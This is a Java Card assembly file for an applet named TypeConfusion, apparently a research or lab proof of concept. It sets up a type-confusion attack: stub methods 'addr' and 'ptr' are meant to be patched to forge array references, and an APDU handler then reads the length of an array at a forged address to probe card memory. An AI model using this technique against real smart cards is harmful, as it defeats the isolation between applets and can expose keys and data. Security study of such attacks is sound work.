// converted by version 1.3
// on Thu Nov 07 23:57:36 CET 2019

.package com/type_confusion {
	.aid 0xA0:0x0:0x0:0x0:0xAA:0x55:0x1;
	.version 1.0;

	.imports {
		0xA0:0x0:0x0:0x0:0x62:0x1:0x1 1.3;		//javacard/framework
		0xA0:0x0:0x0:0x0:0x62:0x0:0x1 1.0;		//java/lang
	}

	.constantPool {
		// 0
		instanceFieldRef byte[] TypeConfusion/mem;
		// 1
		instanceFieldRef byte[] TypeConfusion/file;
		// 2
		staticMethodRef 0.3.0()V;		// javacard/framework/Applet.<init>()V
		// 3
		staticMethodRef TypeConfusion/<init>([BSB)V;
		// 4
		classRef TypeConfusion;
		// 5
		virtualMethodRef 0.3.1()V;		// register()V
		// 6
		virtualMethodRef 0.10.1()[B;		// getBuffer()[B
		// 7
		virtualMethodRef 0.3.3()Z;		// selectingApplet()Z
		// 8
		staticMethodRef 0.7.1(S)V;		// javacard/framework/ISOException.throwIt(S)V
		// 9
		staticMethodRef TypeConfusion/addr([B)S;
		// 10
		staticMethodRef TypeConfusion/ptr(S)[B;
		// 11
		staticMethodRef 0.16.6([BSS)S;		// javacard/framework/Util.setShort([BSS)S
		// 12
		virtualMethodRef 0.10.8(SS)V;		// setOutgoingAndSend(SS)V
	}

	.class public TypeConfusion 0 extends 0.3 {		// extends javacard/framework/Applet

		.fields {
			 byte[] mem 0;		// [B
			 byte[] file 1;		// [B
			protected static final byte CLA_APP = -96;		// B
			protected static final byte INS_PATCH = -76;		// B
		}

		.publicMethodTable 7 {
			equals(Ljava/lang/Object;)Z;
			register()V;
			register([BSB)V;
			selectingApplet()Z;
			deselect()V;
			getShareableInterfaceObject(Ljavacard/framework/AID;B)Ljavacard/framework/Shareable;;
			select()Z;
			process(Ljavacard/framework/APDU;)V;
		}

		.packageMethodTable 0 {
		}

		.method public static install([BSB)V 0 {
			.stack 5;
			.locals 0;

				L0:	new 4;		// com/type_confusion/TypeConfusion
					dup;
					aload_0;
					sload_1;
					sload_2;
					invokespecial 3;		// com/type_confusion/TypeConfusion.<init>([BSB)V
					pop;
					return;
		}

		.method protected <init>([BSB)V 1 {
			.stack 5;
			.locals 0;

				L0:	aload_0;
					invokespecial 2;		// javacard/framework/Applet.<init>()V
					aload_0;
					sconst_4;
					newarray 11;
					dup;
					sconst_0;
					bspush 127;
					bastore;
					dup;
					sconst_1;
					sconst_m1;
					bastore;
					dup;
					sconst_2;
					sconst_1;
					bastore;
					dup;
					sconst_3;
					sconst_0;
					bastore;
					putfield_a 0;		// reference com/type_confusion/TypeConfusion.mem
					aload_0;
					getfield_a_this 0;		// reference com/type_confusion/TypeConfusion.mem
					putfield_a 1;		// reference com/type_confusion/TypeConfusion.file
					aload_0;
					invokevirtual 5;		// register()V
					return;
		}

		.method public process(Ljavacard/framework/APDU;)V 7 {
			.stack 3;
			.locals 5;

			.descriptor	Ljavacard/framework/APDU;	0.10;

				L0:	aload_1;
					invokevirtual 6;		// getBuffer()[B
					astore 6;
					aload_0;
					invokevirtual 7;		// selectingApplet()Z
					ifeq L2;
				L1:	return;
				L2:	aload 6;
					sconst_0;
					baload;
					bspush -96;
					if_scmpeq L4;
				L3:	sspush 28160;
					invokestatic 8;		// javacard/framework/ISOException.throwIt(S)V
				L4:	aload 6;
					sconst_1;
					baload;
					slookupswitch L6 1 -76 L5;
				L5:	aload_0;
					getfield_a_this 0;		// reference com/type_confusion/TypeConfusion.mem
					invokestatic 9;		// com/type_confusion/TypeConfusion.addr([B)S
					sconst_4;
					sadd;
					invokestatic 10;		// com/type_confusion/TypeConfusion.ptr(S)[B
					putfield_a 1;		// reference com/type_confusion/TypeConfusion.file
					aload 6;
					sconst_0;
					getfield_a_this 1;		// reference com/type_confusion/TypeConfusion.file
					arraylength;
					invokestatic 11;		// javacard/framework/Util.setShort([BSS)S
					pop;
					aload_1;
					sconst_0;
					sconst_2;
					invokevirtual 12;		// setOutgoingAndSend(SS)V
					goto L7;
				L6:	sspush 27904;
					invokestatic 8;		// javacard/framework/ISOException.throwIt(S)V
				L7:	return;
		}

		.method public static addr([B)S 2 {
			.stack 1;
			.locals 0;

				L0:	sconst_0;
					sreturn;
		}

		.method public static ptr(S)[B 3 {
			.stack 1;
			.locals 0;

				L0:	aconst_null;
					areturn;
		}

		.method public static addr2([S)[S 4 {
			.stack 1;
			.locals 0;

				L0:	aload_0;
					areturn;
		}

		.method public static ptr2(B)B 5 {
			.stack 1;
			.locals 0;

				L0:	sload_0;
					sreturn;
		}

	}

}
